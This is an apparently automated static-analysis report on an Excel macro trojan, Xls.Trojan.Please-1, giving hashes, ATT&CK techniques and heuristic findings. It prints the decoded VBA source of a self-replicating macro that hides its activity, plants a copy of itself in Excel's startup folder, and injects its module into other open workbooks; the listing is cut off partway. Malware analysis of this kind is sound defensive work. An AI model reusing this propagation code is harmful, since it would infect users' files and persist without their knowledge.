Xls.Trojan.Please-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 701ca5fe6a861001…

MALICIOUS

Office (OLE)

Size: 44.5 KB
Created: 2000-02-14 16:37:00
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 51a7827bcdd9dcf3402a50c57d7115cf
SHA-1: 74a00b01c6dcfd35e5ec44e3fc8c7cc217e3bf58
SHA-256: 701ca5fe6a8610019cbdcb07ba6015497064862f2c60ff8dcfe19a2e96034445
Risk Score: 220

Malware Insights

Xls.Trojan.Please-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is an Excel workbook containing VBA macros, including Auto_Open and Auto_Close routines, which are commonly used to execute malicious code when the document is opened or closed. The presence of these macros and the ClamAV detection signature 'Xls.Trojan.Please-1' strongly indicate malicious intent, likely to download and execute further payloads or perform other harmful actions.

Heuristics 4

  • ClamAV: Xls.Trojan.Please-1 [critical] [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Trojan.Please-1
  • VBA macros detected [medium] [OLE_VBA_MACROS] (2 related findings)
    Document contains VBA macro code
  • Auto_Open macro [high] [OLE_VBA_AUTO]
    Auto_Open macro
  • Auto_Close macro [high] [OLE_VBA_AUTOCLOSE]
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4384 bytes
SHA-256: aa0cb446c28ab7c8f2d12ad00c080b7a84c1ebd6a62732d72353929e0e82739c
Detection
ClamAV: Xls.Trojan.Please-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Rem i

Dim TM
Dim TC

Sub test()
    Application.OnWindow = "check"
End Sub

Sub Untest()
    Application.OnWindow = ""
End Sub


Sub Check_1()
    Check
End Sub

Sub Auto_Close()
    Application.OnWindow = ""
End Sub

Sub Auto_Open()
Dim NameOfCurrentWorkBook As String
Dim i
   Rem On Error Resume Next
   Application.ScreenUpdating = False
   Application.DisplayAlerts = False
   NameOfCurrentWorkBook = ThisWorkbook.Name
   If UCase(Dir(Application.StartupPath + "\Book.xls")) <> UCase("BOOK.xls") Then
    If NameOfCurrentWorkBook <> "Book.xls" Then
        Rem  Writing Book1 an Setting OnWindow
        If Workbooks.Count > 1 Then
            For i = 1 To Workbooks.Count ' check for Workbook with name Book1.xls
                If Workbooks(i).Name = "Book.xls" Then
                    Workbooks(i).Close
                End If
            Next i
        End If
        Rem writing Book1
        Set TM = ThisWorkbook.VBProject.VBComponents("module1").CodeModule
        Set NewBook1 = Application.Workbooks.Add
        Set TC = NewBook1.VBProject.VBComponents.Add(1).CodeModule
        For j = 1 To TM.CountOfLines
             TC.InsertLines j, TM.Lines(j, 1)
        Next j
        NewBook1.Activate
        ActiveWindow.Visible = False
        NewBook1.SaveAs FileName:=Application.StartupPath + "\Book.xls", AddToMru:=False
     End If
    End If
    Application.OnWindow = "Check_1"
    Application.ScreenUpdating = True
    Application.DisplayAlerts = True
End Sub

Sub Check()
Dim oldStatusBar
Dim QuantOfModules
Dim i, j As Integer
Dim ModuleExist As Boolean
Dim NameOfCurrentModule As String
Dim NewBook1

oldStatusBar = Application.DisplayStatusBar
Application.DisplayStatusBar = True
Application.ScreenUpdating = False
Application.DisplayAlerts = False
Rem On Error Resume Next
Set TM = ThisWorkbook.VBProject.VBComponents("module1").CodeModule
If TM <> Empty Then
    If Workbooks.Count > 1 Then
        For i = 2 To Workbooks.Count
            ModuleExist = False
            For j = 1 To Workbooks(i).VBProject.VBComponents.Count
                NameOfCurrentModule = Workbooks(i).VBProject.VBComponents.Item(j).Name
                If NameOfCurrentModule = "Module1" Then
                    ModuleExist = True
                End If
            Next j
            If ModuleExist <> True Then
                Set TC = Workbooks(i).VBProject.VBComponents.Add(1).CodeModule
            Else
                Set TC = Workbooks(i).VBProject.VBComponents("module1").CodeModule
            End If
            
            FirstLine = TC.Lines(1, 1)
            If FirstLine <> "Rem i" Then
                For l = 1 To TC.CountOfLines
                    TC.DeleteLines l, 1
                    Application.StatusBar = "Please be patient...-" + Str(l)
                Next l
                For j = 1 To TM.CountOfLines
                    TC.InsertLines j, TM.Lines(j, 1)
                    Appli
... (truncated)